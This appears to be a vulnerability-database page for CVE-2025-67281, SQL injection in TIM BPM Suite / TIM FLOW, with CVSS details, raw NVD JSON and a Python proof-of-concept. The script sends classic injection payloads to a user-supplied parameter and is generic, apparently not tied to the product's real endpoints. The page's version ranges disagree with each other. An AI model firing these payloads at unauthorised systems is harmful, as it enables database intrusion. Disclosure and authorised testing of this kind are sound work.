Security Vulnerability Report
中文
CVE-2025-67281 CVSS 5.4 MEDIUM

CVE-2025-67281

Published: 2026-01-09 16:16:08
Last Modified: 2026-01-22 21:35:21

Description

In TIM BPM Suite/ TIM FLOW through 9.1.2 multiple SQL injection vulnerabilities exists which allow a low privileged and administrative user to access the database and its content.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:tim-solutions:tim_flow:*:*:*:*:*:*:*:* - VULNERABLE
TIM BPM Suite < 9.1.2
TIM FLOW < 9.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-67281 SQL Injection PoC # Target: TIM BPM Suite / TIM FLOW < 9.1.2 def test_sqli(url, param_name): """Test for SQL injection vulnerability""" # Boolean-based blind SQL injection payload payloads = [ "' OR '1'='1", "' OR 1=1--", "' UNION SELECT NULL--", "admin'--" ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/x-www-form-urlencoded' } for payload in payloads: try: data = {param_name: payload} response = requests.post(url, data=data, headers=headers, timeout=10) # Check for SQL error messages sql_errors = [ 'SQL syntax', 'MySQL', 'ORA-', 'PostgreSQL', 'Microsoft SQL', 'ODBC', 'sqlite3', 'SQLite' ] for error in sql_errors: if error in response.text: print(f"[+] Potential SQLi found with payload: {payload}") print(f"[+] Error detected: {error}") return True except requests.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == '__main__': if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_url> <vulnerable_param>") sys.exit(1) target_url = sys.argv[1] param = sys.argv[2] print(f"[*] Testing {target_url} for CVE-2025-67281") test_sqli(target_url, param)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67281", "sourceIdentifier": "[email protected]", "published": "2026-01-09T16:16:07.513", "lastModified": "2026-01-22T21:35:21.023", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In TIM BPM Suite/ TIM FLOW through 9.1.2 multiple SQL injection vulnerabilities exists which allow a low privileged and administrative user to access the database and its content."}, {"lang": "es", "value": "En TIM BPM Suite/ TIM FLOW hasta 9.1.2 existen múltiples vulnerabilidades de inyección SQL que permiten a un usuario con pocos privilegios y a un usuario administrativo acceder a la base de datos y a su contenido."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tim-solutions:tim_flow:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.1.2", "matchCriteriaId": "071D6670-88DB-4539-A1F9-1850251BDD53"}]}]}], "references": [{"url": "https://tim-doc.atlassian.net/wiki/spaces/eng/pages/230981636/Release+Notes", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.y-security.de/news-en/tim-bpm-suite-tim-flow-multiple-vulnerabilities/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}